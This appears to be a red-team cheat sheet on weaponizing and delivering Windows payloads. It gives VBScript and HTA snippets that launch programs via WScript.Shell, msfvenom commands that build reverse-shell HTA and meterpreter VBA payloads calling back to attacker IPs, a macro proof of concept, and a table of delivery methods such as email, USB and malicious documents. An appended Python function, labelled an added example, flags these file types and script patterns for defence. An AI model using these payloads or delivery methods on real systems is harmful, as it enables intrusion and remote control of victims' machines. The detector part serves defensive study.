Weaponization and Delivery
Developing deliverable payloads.
Last updated: May 4th, 2023
WSH
' Executing an exe from within a .vbs file
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
HTA
Simple
<html>
<body>
<script>
var c= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
Metasploit
#reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o shell.hta
#or
msf6 > use exploit/windows/misc/hta_server
VBA
Office
For the macro to work, the document must be saved in a macro-enabled format, such as:
- Word
  - .dot
  - .dotm
  - .docm
- PowerPoint
  - .pptm
  - .potm
  - .ppsm
  - .ppam
  - .ppa
- Excel
  - .xls
  - .xlt
  - .xlsb
  - .xlsm
  - .xltm
  - .xlam
The Macro:
Sub PoC()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
#or
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.50.159.15 LPORT=443 -f vba
Main Delivery Methods
Delivery Method | Description | Advantages |
---|---|---|
Email | Weaponized scripts are delivered through malicious email attachments or links. | |
Web | Weaponized scripts are hosted on a compromised or malicious website. | |
USB | Weaponized scripts are placed on a USB drive and physically delivered or left in a targeted location. | |
Malicious Document | Weaponized scripts are embedded within seemingly harmless documents (e.g., Word, Excel, PDF). | |
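
From the defender's side, the file types and script patterns listed on this page are what an attachment filter keys on. The following is an added example, not part of the original page: the `triage` function, its verdict names and the sample inputs are assumptions constructed for illustration.

```python
import os
import re

# Extensions named on this page: script-host files and macro-enabled Office formats.
SCRIPT_EXTS = {".vbs", ".hta"}
MACRO_EXTS = {".dot", ".dotm", ".docm", ".pptm", ".potm", ".ppsm", ".ppam", ".ppa",
              ".xls", ".xlt", ".xlsb", ".xlsm", ".xltm", ".xlam"}

# Content indicators taken from the page's WSH/HTA/VBA snippets.
INDICATORS = {
    "wscript_shell": re.compile(r"wscript\.shell", re.I),
    "object_creation": re.compile(r"\b(?:ActiveXObject|CreateObject)\s*\(", re.I),
    "run_call": re.compile(r"\.Run\b", re.I),
}


def triage(filename: str, content: bytes) -> dict:
    """Return {'verdict': 'block'|'review'|'allow', 'reasons': [...]} for one attachment."""
    # Windows drops trailing dots/spaces and only the last extension selects the handler,
    # so "invoice.pdf.HTA " is still treated as an HTA.
    ext = os.path.splitext(filename.strip().rstrip(". ").lower())[1]
    # Script files are often saved as UTF-16; dropping NUL bytes lets one regex set cover both.
    # VBA source inside Office files is stored compressed, so only the extension check covers it.
    text = content.replace(b"\x00", b"").decode("latin-1")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]

    reasons = []
    if ext in SCRIPT_EXTS:
        reasons.append(f"script-host extension {ext}")
    if ext in MACRO_EXTS:
        reasons.append(f"macro-capable Office extension {ext}")
    reasons += [f"content indicator {h}" for h in hits]

    if ext in SCRIPT_EXTS or {"wscript_shell", "run_call"} <= set(hits):
        verdict = "block"
    elif reasons:
        verdict = "review"
    else:
        verdict = "allow"
    return {"verdict": verdict, "reasons": reasons}


# Constructed sample inputs (the HTA body mirrors the snippet on this page).
SAMPLE_HTA = b"<html><body><script>var c='cmd.exe'; new ActiveXObject('WScript.Shell').Run(c);</script></body></html>"
SAMPLE_VBS_UTF16 = 'Set shell = WScript.CreateObject("Wscript.Shell")\r\nshell.Run("calc.exe"),0,True'.encode("utf-16-le")

if __name__ == "__main__":
    for name, body in [("invoice.pdf.HTA ", SAMPLE_HTA), ("notes.txt", SAMPLE_VBS_UTF16),
                       ("report.docm", b"PK\x03\x04"), ("notes.txt", b"meeting at 10")]:
        print(name, triage(name, body))
```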